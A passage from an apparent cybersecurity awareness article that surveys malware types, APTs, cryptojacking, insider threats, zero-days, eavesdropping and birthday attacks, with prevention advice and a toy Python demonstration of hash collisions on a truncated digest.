- Stealth viruses: these take over system functions to conceal themselves, for example by intercepting the calls anti-malware software makes so that an infected area is reported as clean. They also hide any increase in the size of an infected file and any change to its last-modified timestamp.
- Trojans: a Trojan, or Trojan horse, hides malicious intent inside a seemingly useful program and does not self-replicate. Trojans come as backdoors, downloaders, information stealers, remote access tools or DDoS agents. One recent example is the Astaroth Trojan, which hit 8,000 machines in a week.
- Polymorphic viruses: these cycle through varying rounds of encryption and decryption each time they infect a new piece of code, so no two copies look alike. They are difficult to detect by signature, although the constant modification of their code gives them a tell-tale high entropy.
- Logic bombs: malicious code appended to an application and triggered by a specific occurrence, such as a logical condition or a particular date and time. Worms that carry logic bombs therefore behave differently at different times. Roger Duronio of UBS PaineWebber is a well-known example of someone who deployed a logic bomb against his employer.
- Worms: worms do not attach to a host file; they are self-contained programs that propagate across networks on their own. Many spread through email attachments, and opening the attachment activates the program; a typical worm then mails a copy of itself to every contact in the infected computer's address book. Besides whatever malicious payload they carry, worms spreading across the internet can overload email servers and cause DoS conditions. Worms are categorized by how they spread: internet, email, instant messaging, IRC (Internet Relay Chat), file sharing and so on. The most notorious are the Morris worm, the Storm worm and SQL Slammer.
- Droppers: a dropper installs viruses on computers. The dropper itself often contains no detectable malicious code; once resident on a compromised system, it connects to the internet and downloads the actual malware or updates to it.
- Ransomware: one of the biggest cyber security threats of 2018, ransomware blocks access to the victim's data and threatens to delete and/or publish it unless a hefty ransom is paid. Simple variants merely lock the screen, which a knowledgeable person can reverse; advanced ones use cryptoviral extortion, encrypting the victim's files so that they are practically impossible to recover without the decryption key. The million-dollar example is SamSam, which collected $6 million in ransom payments, typically demanding around $50,000 in bitcoin, and caused an estimated $30 million in losses to victims.
- Adware: adware is used by companies for marketing, displaying banners while a program is running. It can be downloaded automatically while browsing and shows up in pop-up windows or toolbars; malvertising uses the same channels to deliver malicious content. Recently, 100 apps linked to an adware campaign were removed from Google Play.
- Spyware: spyware is installed to collect information, tracking everything users do without their knowledge and sending the data to a remote party. It often also downloads other malicious programs from the internet. Spyware works like adware but is installed unknowingly along with freeware applications. If you are a tourist, be careful: it came to light that border control authorities in China's Xinjiang region were installing surveillance software on tourists' devices without their consent.
Cyber Attacks in a nutshell – Malware Special!
Is Malware Preventable? Yes…
The following steps help you decrease the likelihood of all types of malware infection:
- Use a good quality anti-malware application.
- Do not execute any program unless you trust its source.
- Disable scripting features you do not need, such as Office macros and unnecessary browser plug-ins, to shrink the attack surface.
- Never open emails from unknown senders, especially those with attachments ending in .exe or .vbs.
- Keep installing the latest patches for your operating system.
- Scan DVDs, CDs, pen drives and any other external storage before using them.
- Do not accept programs from instant messaging applications.
- Scan any program you download before running it.
- Backups are essential to reduce the impact of a ransomware attack, but only if they are organized and tested: keep at least one copy offline or otherwise out of reach of the systems that could be infected, know where everything is, and practice restoring. A cesspool of files and folders that nobody can navigate is not a backup.
- Spam filtering for email-based attacks.
- Disable unnecessary exposed services.
- Change default/easy-to-guess passwords on all of your accounts, systems, and services.
Advanced Persistent Threat
An advanced persistent threat (APT) is a prolonged, targeted attack in which an intruder gains access to a network and remains undetected for an extended period. The intention is usually to monitor network activity and quietly exfiltrate data rather than to damage the network or the organization.
APT attacks target organizations in sectors such as national defense, manufacturing and finance, which handle high-value information: military plans, intellectual property and other sensitive data.
It is one of the most complex attacks to deal with, because the source and the exact techniques used are hard to establish. Attackers typically move through reconnaissance, initial compromise, establishing a foothold, escalating privileges, moving laterally and finally collecting and exfiltrating data.
To protect against APTs you need to understand how they work: each stage of that lifecycle is a place where monitoring can catch them, and the long dwell time is the defender's opportunity as much as the attacker's.
Cryptojacking
Cryptocurrency hijacking is the newest addition to this world of cyber threats.
Digital currency and mining are becoming popular not only among would-be millionaires but also among cybercriminals, who have found their own way to profit from cryptocurrency mining.
Cryptocurrency investors and traders are an easy target for this attack, but anyone with a CPU is a potential victim.
"Cryptojacking" silently injects mining code into a system, then uses its CPU, GPU and electricity to mine cryptocurrency for the attacker.
Cryptojacking is becoming more popular because it offers more money for less risk.
A cryptojacker either tricks you into loading mining code onto your computer, using phishing-like tactics, or injects a mining script into a website or an ad that is then delivered to many sites.
Unlike other threats, cryptojacking scripts do not damage computers or victims' data; they steal processing resources. For individual users slower performance may be just an annoyance, but for organizations it means higher power bills, shortened hardware life and an attacker who already has a foothold.
How to protect against cryptojacking?
- Keep your machines and systems patched and up-to-date
- Monitor for abnormal GPU and CPU usage
Insider Attack
Insider attacks are riskier and deadlier than any other, because they depend on the users, often the employees, of an organization. They are not always intentional; sometimes they happen by accident or through negligence.
Types of threatening Insiders
- OBLIVIOUS INSIDER: insiders with access to the company's sensitive information whose accounts or devices have been compromised from the outside; the attacker works through them while the employees remain unaware.
- MALICIOUS INSIDER: insiders who intentionally steal data or damage networks, such as an employee who deletes company data on their last day of work.
- NEGLIGENT INSIDER: insiders who are uneducated about security threats or who bypass protocol for the sake of convenience; these are the most vulnerable to social engineering.
- PROFESSIONAL INSIDER: insiders who make a career of exploiting companies' vulnerabilities and selling them, or the data they obtain, on the dark web.
Prevention against Insiders Attacks
- Build procedures to detect and prevent misuse into your security policy, together with guidelines for conducting insider investigations.
- Review your policies, especially those dealing with incident handling, and focus on the sections that cover trusted insiders.
- Define who is allowed to access what data, under which circumstances, and with whom they can share.
- Keep unnecessary people away from critical infrastructure.
- Isolate high-value systems in limited zones.
- If possible, install network forensic analysis tools to analyze the flow of information.
- Require strong multi-factor authentication for sensitive applications or systems, such as HR or accounting.
- Secure hosts: eliminate unused services and lock down configurations.
- Restrict, by policy, how confidential data may be disseminated.
- Deploy an intrusion detection system (IDS).
- Use email firewalls (security gateways).
- Digital rights management tools could also be used to restrict the distribution of documents, accessing rights, and permissions.
Zero-day Exploit
A zero-day exploit targets a vulnerability in a system or software before the vendor has patched it. Attackers scan devices or software for a weakness, build a tool to exploit it, and launch the attack.
When a vulnerability is identified, there is always a window before a patch or workaround is available and deployed. Within that window, attackers keep exploiting the vulnerability.
How to detect and protect against Zero-day exploits?
By their nature these attacks are the hardest to defend against, precisely because no fix exists yet; such vulnerabilities are highly prized not only by cybercriminals but by nation states too.
- Constant monitoring is a must.
- Infrastructure penetration testing can help in identifying the network’s vulnerabilities before cybercriminals do.
- Keep operating systems and application software up to date.
- Segment the network into VLANs, with a firewall controlling traffic between them, so that one compromised host cannot reach everything.
- Protect against wireless-borne malware with a properly secured Wi-Fi network.
- Stick to HTTPS sites, bearing in mind that a valid certificate only proves the connection is encrypted, not that the site is benign.
Eavesdropping Attack
Eavesdropping attacks intercept network traffic; the attacker obtains passwords, credit card numbers and other information that users send over the network.
Eavesdropping can be passive or active:
- Passive: the attacker obtains information simply by listening to messages transmitted on the network.
- Active: the attacker poses as a legitimate party and sends queries to the transmitters to draw out information; this is also called probing, scanning or tampering.
How to detect and prevent Eavesdropping attack?
Detecting passive eavesdropping matters more than spotting active attacks, because an active attacker first has to learn about the legitimate parties through passive eavesdropping.
The best protection is encryption: TLS for the applications themselves, and a VPN on networks you do not control.
Birthday Attack
Birthday attacks target the hash algorithms used to verify the integrity of software, messages or digital signatures. This cryptographic attack exploits the mathematics of the birthday problem in probability theory to abuse communication between two or more parties. A message processed by a hash function produces a message digest (MD) of fixed length, independent of the length of the message; this digest characterizes the message.
The birthday attack exploits the probability of finding two different messages with the same digest: for an n-bit digest that takes only about 2^(n/2) random messages, not 2^n. An attacker who finds such a pair can have the victim sign the harmless message and then substitute the malicious one, since the signature covers only the digest.
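The 2^(n/2) figure can be checked numerically, and the attack itself can be demonstrated against a deliberately weakened hash. The code below is an added example for this article, not code from the original page: it computes the exact collision probability for k random n-bit digests, the number of messages needed to reach a given probability, and then finds a real collision on SHA-256 truncated to 24 bits. The truncation is the example's own device to make the search finish instantly; it stands in for a hash that is too short, which is exactly what the birthday bound warns against.

```python
"""Birthday bound: how many messages until two share a digest, with a demonstration
against a deliberately truncated hash.

Added example for this article, not code from the page. Truncating SHA-256 to a
few bytes stands in for a weak hash so the collision search finishes instantly;
real digests are far longer, which is exactly why the bound matters.
"""
import hashlib
import math
import os


def collision_probability(n_bits, k):
    """Exact P(at least one collision) among k uniformly random n-bit digests."""
    n = 2 ** n_bits
    # P(no collision) = prod_{i=0}^{k-1} (1 - i/n); summed in log space so that
    # the product does not underflow for large k.
    log_no_collision = sum(math.log1p(-i / n) for i in range(k))
    return 1 - math.exp(log_no_collision)


def messages_for_probability(n_bits, p=0.5):
    """Approximate k with P(collision) = p: k ~ sqrt(2 * 2**n * ln(1/(1-p))).

    For p = 0.5 this is about 1.18 * 2**(n/2), the familiar birthday bound.
    """
    return math.ceil(math.sqrt(2 * (2 ** n_bits) * math.log(1 / (1 - p))))


def truncated_digest(data, n_bytes):
    """SHA-256 cut down to n_bytes: a stand-in for a hash that is too short."""
    return hashlib.sha256(data).digest()[:n_bytes]


def find_collision(n_bytes, max_tries=10_000_000):
    """Hash random messages until two distinct inputs share a truncated digest.

    Returns (message_a, message_b, attempts). With n_bytes=3 (24 bits) this
    takes on the order of 2**12 = 4096 attempts, not 2**24.
    """
    seen = {}
    for attempt in range(1, max_tries + 1):
        msg = os.urandom(8)
        d = truncated_digest(msg, n_bytes)
        if d in seen and seen[d] != msg:
            return seen[d], msg, attempt
        seen[d] = msg
    raise RuntimeError("no collision found within max_tries")


if __name__ == "__main__":
    for bits in (24, 64, 128, 256):
        print(f"{bits:>3}-bit digest: ~{messages_for_probability(bits):.3e} messages for a 50% collision")
    a, b, attempts = find_collision(3)
    print(f"24-bit collision after {attempts} attempts: {a.hex()} and {b.hex()} "
          f"both hash to {truncated_digest(a, 3).hex()}")
```

The numbers are the whole story: a 128-bit digest (MD5-sized) falls at roughly 2^64 messages, which is within reach of well-funded attackers, while 256 bits pushes the bound to 2^128. This is why digest length is chosen as twice the desired security level, and why finding a collision in a toy 24-bit hash takes thousands of tries rather than millions.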
That covers the attacks; now for some basic prevention practices.
Have a look!
Emerging Cyber Threats
Cyber threats are never static; millions of new malware variants appear every year.
Can you guess who might be motivated to conduct a cyber attack or breach data?
Cyber security threats come from a number of places, people and contexts, including:
- Individuals who build their own attack tools
- Criminal organizations that operate like businesses, with large numbers of employees
- Organized crime groups
- Industrial spies
- Cunning insiders
- Business competitors
Nation states are the source of many of the most severe attacks, from basic espionage to operations aimed at large-scale disruption.
There are "cyber weapons" too, which play their part in cyber warfare. In some countries the boundary between national intelligence agencies and criminal organizations is blurred, with criminals doing the work of cyber espionage.
Many vulnerabilities are traded on the "dark web", a disorganized yet widespread criminal marketplace where attackers can buy malware, ransomware, credentials for breached systems and much more.
Whether you are protecting yourself or your business, do not assume that attackers will never find you.
Best Practices for Cyber Protection
Cyber Defense for Businesses
Enterprise best practices include basic but important countermeasures such as:
- Patching systems. When a vendor discovers (or is informed of) a security flaw in its infrastructure or product, it writes code that fixes, or "patches", the problem. Patch at least monthly, and immediately for flaws that are being actively exploited; many attacks would fail if IT departments applied security patches promptly.
A host of new technologies are coming onto the market that make it easier to mount a robust defense against increasing cyber threats, such as:
- Outsourced security services
- Systems to enable collaboration between security teams
- Point solutions for phishing and secure browsing
- Continual attack simulation tools
Cyber Defense for Individuals
For individuals, the practices are simple.
The good news is that in most cases large security organizations stand between the consumer and the attacker, but there are still preventative measures you should take to protect your data.
- Password hygiene: big organizations cannot protect us against phishing or password attacks; it is our job to make passwords hard to guess or crack, and to use a different one for every account.
- Be cautious: take care when opening file attachments; phishing and spear-phishing emails look real and are an easy way in for attackers. Pay attention.
- Make use of software: use antivirus, a VPN and a firewall, and keep your system up to date with automated, scheduled scans.
Mounting a cyber defense requires an in-depth understanding of the offense.
I have reviewed many of the most common cyber security attacks that hackers around the world use to disrupt and compromise information systems.
As you will have noticed, attackers have many options, from malware infection, DDoS assaults and man-in-the-middle interception to brute-force password guessing and other attempts to gain unauthorized access to infrastructure and sensitive data.
But the measures to mitigate them stay the same: keep systems and anti-virus databases up to date, train employees, configure firewalls to allow only the specific ports and hosts that are needed, make regular backups, keep passwords strong, use a least-privilege model, and continuously audit your systems for suspicious activity.
Within an organization, an effective cyber security approach also requires that the people, computers, processes, networks and technology are all equally involved. If they complement each other, standing up against cyber threats and attacks becomes very possible.